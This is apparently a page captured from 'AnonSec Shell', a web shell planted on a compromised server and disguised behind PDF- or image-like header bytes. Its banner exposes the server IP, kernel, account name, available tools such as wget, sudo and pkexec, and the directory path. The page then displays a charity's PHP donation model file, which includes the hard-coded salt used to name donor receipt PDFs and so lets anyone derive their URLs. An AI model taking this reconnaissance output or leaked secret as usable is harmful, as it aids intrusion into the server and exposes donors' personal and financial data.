%PDF-1.3 %��C ��C ����"#Qr����&1!A"2qQa��� ?�y,�/3J�ݹ�߲؋5�Xw���y�R��I0�2�PI�I��iM��r�N&"KgX:��nTJnLK��@!�-� ���m�;�g���&�hw���@�ܗ 9�-�.�1 AnonSec Shell
AnonSec Shell
Server IP : 192.175.98.165  /  Your IP : 216.73.216.219
Web Server : Apache
System : Linux server.tobedev.com 4.18.0-553.72.1.el8_10.x86_64 #1 SMP Tue Sep 2 06:07:48 EDT 2025 x86_64
User : meir5web ( 1019)
PHP Version : 7.4.33
Disable Function : passthru,shell_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/meir5web/fichiers_meirpanim/

Current File : /home/meir5web/fichiers_meirpanim/dons.class.php
<?php
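/**
 * Active-record style model for one donation row of `tbl_dons2`, plus helpers
 * for the generated CERFA receipt PDF and the `tbl_stripe` lookup table.
 *
 * All database access goes through the global `$mysqli` connection and uses
 * prepared statements with bound parameters; no property or search value is
 * concatenated into SQL text. Reading result sets relies on
 * mysqli_stmt_get_result(), which needs the mysqlnd driver.
 *
 * On a database error the SQL text and driver message are written to the
 * error log and the script stops with a short generic message, so query
 * structure is not echoed to the HTTP client.
 */
class dons
{
    /** Columns copied from a fetched row into same-named properties by set_vars(). */
    private const READ_COLUMNS = [
        'id_dons', 'titre', 'nom', 'prenom', 'adresse', 'cp', 'ville', 'pays',
        'tel', 'portable', 'email', 'type_don', 'montant', 'occasion', 'date',
        'periodicite', 'duree', 'du_mois', 'du_jour', 'nom_autre',
        'prenom_autre', 'adresse_autre', 'cp_autre', 'ville_autre', 'valide',
        'date_creation', 'commentaire',
    ];

    /** Columns written from same-named properties by insert() and update(). */
    private const WRITE_COLUMNS = [
        'titre', 'nom', 'prenom', 'adresse', 'cp', 'ville', 'pays', 'tel',
        'portable', 'email', 'type_don', 'montant', 'occasion', 'date',
        'periodicite', 'duree', 'du_mois', 'du_jour', 'nom_autre',
        'prenom_autre', 'adresse_autre', 'cp_autre', 'ville_autre', 'valide',
        'commentaire',
    ];

    public $id_dons;
    public $titre;
    public $nom;
    public $prenom;
    public $adresse;
    public $cp;
    public $ville;
    public $pays;
    public $tel;
    public $portable;
    public $email;
    public $type_don;
    public $montant;
    public $occasion;
    public $date;
    public $periodicite;
    public $duree;
    public $du_mois;
    public $du_jour;
    public $nom_autre;
    public $prenom_autre;
    public $adresse_autre;
    public $cp_autre;
    public $ville_autre;
    public $valide = 0;
    public $date_creation;
    public $commentaire;
    // Site-relative URL of the receipt PDF, or null when no file exists.
    // Declared explicitly; set_vars() used to create it as a dynamic property.
    public $cerfaUrl;
    // Listing filters read by get_nb_dons()/get_all():
    // 'motcle', 'paiement' (1 or 2), 'date_from' and 'date_to' (d/m/Y).
    public $search = [];

    /**
     * Loads the row whose id equals $this->id_dons into this object.
     *
     * When no row matches, every column property is reset to an empty string,
     * as before.
     */
    public function lecture()
    {
        $rows = $this->fetchRows(
            'SELECT * from `tbl_dons2` where id_dons = ?',
            [$this->id_dons],
            'error don select'
        );

        $this->set_vars($rows === [] ? null : $rows[0]);
    }

    /**
     * Copies a fetched row into the object's properties.
     *
     * @param array|null $data Row keyed by column name; null or a missing key
     *                         yields an empty string for that property.
     */
    public function set_vars($data)
    {
        $row = is_array($data) ? $data : [];

        foreach (self::READ_COLUMNS as $column) {
            // NOTE(review): stripslashes() is kept for backward compatibility,
            // but it also removes backslashes that are legitimately part of the
            // stored value — confirm no legacy rows depend on it, then drop it.
            $this->{$column} = stripslashes((string) ($row[$column] ?? ''));
        }

        $this->cerfaUrl = $this->getCerfaUrl($row['id_dons'] ?? null);
    }

    /**
     * Inserts this donation as a new row, stamps date_creation with the
     * current time and stores the generated id in $this->id_dons.
     */
    public function insert()
    {
        global $mysqli;

        $columns = self::WRITE_COLUMNS;
        $values = [];
        foreach ($columns as $column) {
            $values[] = $this->{$column};
        }
        $columns[] = 'date_creation';
        $values[] = date('Y-m-d H:i:s');

        $sql = 'INSERT INTO `tbl_dons2` (`' . implode('`, `', $columns) . '`) VALUES ('
            . implode(', ', array_fill(0, count($columns), '?')) . ')';

        $stmt = $this->executeStatement($sql, $values, 'error don insert');
        $this->id_dons = mysqli_insert_id($mysqli);
        mysqli_stmt_close($stmt);
    }

    /**
     * Writes the current property values to the row identified by
     * $this->id_dons. The id is bound as a parameter like every other value.
     */
    public function update()
    {
        $assignments = [];
        $values = [];
        foreach (self::WRITE_COLUMNS as $column) {
            $assignments[] = '`' . $column . '` = ?';
            $values[] = $this->{$column};
        }
        $values[] = $this->id_dons;

        $sql = 'update `tbl_dons2` set ' . implode(', ', $assignments) . ' where id_dons = ?';

        mysqli_stmt_close($this->executeStatement($sql, $values, 'error don update'));
    }

    /**
     * Inserts when no id is set yet, updates otherwise.
     */
    public function save()
    {
        if (empty($this->id_dons)) {
            $this->insert();
        } else {
            $this->update();
        }
    }

    /**
     * Counts the donations matching $this->search.
     *
     * @return string Row count, returned as a string as before.
     */
    public function get_nb_dons()
    {
        list($where, $params) = $this->buildSearchFilter();

        $rows = $this->fetchRows(
            'SELECT count(id_dons) AS nb from `tbl_dons2` where 1=1 ' . $where,
            $params,
            'error don select'
        );

        return (string) $rows[0]['nb'];
    }

    /**
     * Returns one page of donations matching $this->search, newest id first.
     *
     * @param int $limit Offset of the first row.
     * @param int $nb    Maximum number of rows.
     *
     * @return dons[]
     */
    public function get_all($limit, $nb)
    {
        list($where, $params) = $this->buildSearchFilter();

        // LIMIT operands are forced to non-negative integers before they reach
        // the SQL text; they were interpolated unchecked before.
        $sql = 'SELECT * from `tbl_dons2` where 1=1 ' . $where
            . sprintf(' order by id_dons desc limit %d,%d', max(0, (int) $limit), max(0, (int) $nb));

        $all = [];
        foreach ($this->fetchRows($sql, $params, 'error don select') as $row) {
            $don = new dons();
            $don->set_vars($row);
            $all[] = $don;
        }

        return $all;
    }

    /**
     * Renders the two CERFA pages to a PDF with wkhtmltopdf.
     *
     * @return string|null Site-relative URL of the PDF, or null when no file
     *                     exists after the run.
     */
    public function createCerfa()
    {
        $code = $this->getCode($this->id_dons);
        $query = http_build_query(['id' => $this->id_dons, 'code' => $code], '', '&');

        $cerfaUrl = '/cerfa/pdf/' . $code . '.pdf';
        $cerfa = ($_SERVER['DOCUMENT_ROOT'] ?? '') . $cerfaUrl;

        // Every dynamic argument is quoted as a whole. Previously only the
        // query string was quoted and the output path was passed bare.
        $commandeExec = implode(' ', [
            '/usr/local/bin/wkhtmltopdf',
            '--margin-top 5 --margin-bottom 5 --margin-left 10 --margin-right 10 --page-height 350',
            escapeshellarg('https://www.meirpanim.fr/cerfa/page1.php?' . $query),
            escapeshellarg('https://www.meirpanim.fr/cerfa/page2.php?' . $query),
            escapeshellarg($cerfa),
        ]);

        $output = [];
        $return = 0;
        exec($commandeExec, $output, $return);

        if ($return !== 0) {
            // The file check below still decides the return value, as before;
            // the exit status is only recorded so failed renders are visible.
            error_log('wkhtmltopdf exited with status ' . $return . ' for don ' . $this->id_dons);
        }

        if (is_file($cerfa)) {
            // Was 0446 (r--r--rw-), which made the receipt world-writable and
            // read-only for its owner; presumably 0644 was intended.
            chmod($cerfa, 0644);

            return $cerfaUrl;
        }

        return null;
    }

    /**
     * Derives the code used in receipt file names and CERFA page URLs.
     *
     * NOTE(review): the code is an unkeyed MD5 over a salt hard-coded in this
     * file and the donation id, so anyone who can read the source can derive
     * the code for any id. If the PDF directory is served without further
     * access control (confirm), the code is the only thing protecting donor
     * receipts. Prefer a random per-donation token stored with the row, or an
     * HMAC keyed from configuration outside the web root. The value is left
     * unchanged here because existing files and links are named after it.
     *
     * @param int|string $id_dons
     *
     * @return string 32-character hexadecimal digest.
     */
    public function getCode($id_dons)
    {
        return md5('Meir26' . $id_dons . 'paniM27');
    }

    /**
     * Returns the site-relative URL of an existing receipt PDF.
     *
     * @param int|string|null $id_dons
     *
     * @return string|null Null when no PDF exists for this id.
     */
    public function getCerfaUrl($id_dons)
    {
        $cerfaUrl = '/cerfa/pdf/' . $this->getCode($id_dons) . '.pdf';

        if (is_file(($_SERVER['DOCUMENT_ROOT'] ?? '') . $cerfaUrl)) {
            return $cerfaUrl;
        }

        return null;
    }

    /**
     * Looks up the donation id recorded for a Stripe payment.
     *
     * @param array $stripeDatas Expects 'payment_intent' and 'client_secret'.
     *
     * @return string|null Donation id, or null when no row matches.
     */
    public function getIdFromStripeDatas($stripeDatas)
    {
        $rows = $this->fetchRows(
            'select id_dons from tbl_stripe where `payment_intent` = ? and `client_secret` = ?',
            [$stripeDatas['payment_intent'] ?? '', $stripeDatas['client_secret'] ?? ''],
            'error don select'
        );

        if ($rows === [] || $rows[0]['id_dons'] === null) {
            return null;
        }

        return (string) $rows[0]['id_dons'];
    }

    /**
     * Records the Stripe identifiers for the current donation.
     *
     * NOTE(review): this persists the PaymentIntent client secret. Check
     * whether the lookup can key on payment_intent alone so the secret does
     * not have to be stored.
     *
     * @param array $stripeDatas Expects 'payment_intent' and 'client_secret'.
     */
    public function insertStripeDatas($stripeDatas)
    {
        $sql = 'INSERT INTO `tbl_stripe` (`id_dons`, `payment_intent`, `client_secret`, `dateIn`)'
            . ' VALUES (?, ?, ?, ?)';

        $values = [
            $this->id_dons,
            $stripeDatas['payment_intent'] ?? '',
            $stripeDatas['client_secret'] ?? '',
            date('Y-m-d H:i:s'),
        ];

        mysqli_stmt_close($this->executeStatement($sql, $values, 'error don insertStripe'));
    }

    /**
     * Builds the WHERE fragment shared by get_nb_dons() and get_all().
     *
     * @return array Two elements: the SQL fragment (with ? placeholders) and
     *               the list of values to bind, in order.
     */
    private function buildSearchFilter()
    {
        $where = '';
        $params = [];

        if (!empty($this->search['motcle'])) {
            $where .= ' and (nom like ? OR prenom like ? OR email like ? OR tel like ? OR portable like ?) ';
            $pattern = '%' . $this->search['motcle'] . '%';
            array_push($params, $pattern, $pattern, $pattern, $pattern, $pattern);
        }

        if (!empty($this->search['paiement'])) {
            if ($this->search['paiement'] == 1) {
                $where .= ' and valide = 1 ';
            } elseif ($this->search['paiement'] == 2) {
                $where .= ' and valide = 0 ';
            }
        }

        $from = $this->searchDateToSql('date_from');
        if ($from !== null) {
            $where .= ' and date_creation >= ? ';
            $params[] = $from . ' 00:00:00';
        }

        $to = $this->searchDateToSql('date_to');
        if ($to !== null) {
            $where .= ' and date_creation <= ? ';
            $params[] = $to . ' 23:59:59';
        }

        return [$where, $params];
    }

    /**
     * Converts a d/m/Y search value to Y-m-d.
     *
     * @param string $key Key in $this->search.
     *
     * @return string|null Null when the value is empty or does not parse;
     *                     the original code hit a fatal error on bad input.
     */
    private function searchDateToSql($key)
    {
        if (empty($this->search[$key]) || !is_scalar($this->search[$key])) {
            return null;
        }

        $date = DateTime::createFromFormat('d/m/Y', (string) $this->search[$key]);

        return $date === false ? null : $date->format('Y-m-d');
    }

    /**
     * Prepares and executes a statement with every parameter bound as a string.
     *
     * Binding as strings mirrors the previous behaviour, where each value was
     * sent as a quoted literal (null becomes an empty string).
     *
     * @param string $sql        SQL text with ? placeholders.
     * @param array  $params     Values to bind, in placeholder order.
     * @param string $errorLabel Generic message shown to the client on failure.
     *
     * @return mysqli_stmt Executed statement; the caller closes it.
     */
    private function executeStatement($sql, array $params, $errorLabel)
    {
        global $mysqli;

        $stmt = mysqli_prepare($mysqli, $sql);
        if ($stmt === false) {
            error_log($errorLabel . ' [prepare] ' . mysqli_error($mysqli) . ' -- ' . $sql);
            die($errorLabel);
        }

        if ($params !== []) {
            $values = array_map('strval', array_values($params));
            mysqli_stmt_bind_param($stmt, str_repeat('s', count($values)), ...$values);
        }

        if (!mysqli_stmt_execute($stmt)) {
            error_log($errorLabel . ' [execute] ' . mysqli_stmt_error($stmt) . ' -- ' . $sql);
            die($errorLabel);
        }

        return $stmt;
    }

    /**
     * Runs a SELECT through executeStatement() and returns all rows.
     *
     * @param string $sql
     * @param array  $params
     * @param string $errorLabel
     *
     * @return array[] Rows keyed by column name.
     */
    private function fetchRows($sql, array $params, $errorLabel)
    {
        $stmt = $this->executeStatement($sql, $params, $errorLabel);

        $result = mysqli_stmt_get_result($stmt);
        if ($result === false) {
            error_log($errorLabel . ' [result] ' . mysqli_stmt_error($stmt) . ' -- ' . $sql);
            die($errorLabel);
        }

        $rows = [];
        while ($row = mysqli_fetch_assoc($result)) {
            $rows[] = $row;
        }

        mysqli_free_result($result);
        mysqli_stmt_close($stmt);

        return $rows;
    }
}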
